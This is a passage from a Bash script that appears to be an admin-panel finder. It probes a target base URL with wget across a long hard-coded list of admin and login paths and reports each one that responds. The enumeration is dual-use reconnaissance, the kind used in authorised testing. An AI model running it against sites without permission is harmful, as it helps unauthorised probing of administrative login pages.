c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator/login.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator/login.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administratoraccounts"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administratorlogin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administratorlogin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administratorlogin.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administratorlogin.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administratorlogin.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administratorlogin.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administratorlogin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrators"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrators.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrators.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrivia"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminitem.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminitem.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminitem"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminitems.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminitems.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminitems"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminLogin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminLogin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin-login.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminLogin.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin-login.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminLogin.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin-login.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminLogin.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin-login.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminLogin.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin-login.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminLogin.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin-login.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminLogin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/affiliate.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/affiliate.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/affiliate.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/affiliate.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/affiliate.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/affiliate.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/auth.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/auth.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/authadmin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/authadmin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/authenticate.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/authenticate.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/authentication.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/authentication.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/authuser.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/authuser.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/autologin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/autologin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/autologin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/backoffice"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/banneradmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bbadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bb-admin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bb-admin/admin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bb-admin/admin.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bb-admin/admin.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bb-admin/admin.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bb-admin/admin.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bb-admin/admin.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bb-admin/admin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bb-admin/index.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bb-admin/index.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bb-admin/index.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bb-admin/index.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bb-admin/index.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bb-admin/index.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bb-admin/index.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bb-admin/login.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bb-admin/login.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bb-admin/login.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bb-admin/login.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bb-admin/login.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bb-admin/login.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bb-admin/login.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bigadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/blogindex"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cadmins"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/ccp14admin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cgi-bin/loginasp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cgi-bin/loginphp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/check.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/check.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/checkadmin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/checkadmin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/checklogin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/checklogin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/checkuser.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/checkuser.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/Clave"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cmsadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cmsadmin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cmsadmin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/config"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/control.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/control.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/control"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/controle"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/controles"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/controlpanel"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/controlpanel.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/controlpanel.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/controlpanel.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/controlpanel.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/controlpanel.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/controlpanel.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/controlpanel.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cp.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cp.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cp.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cp.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cp.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
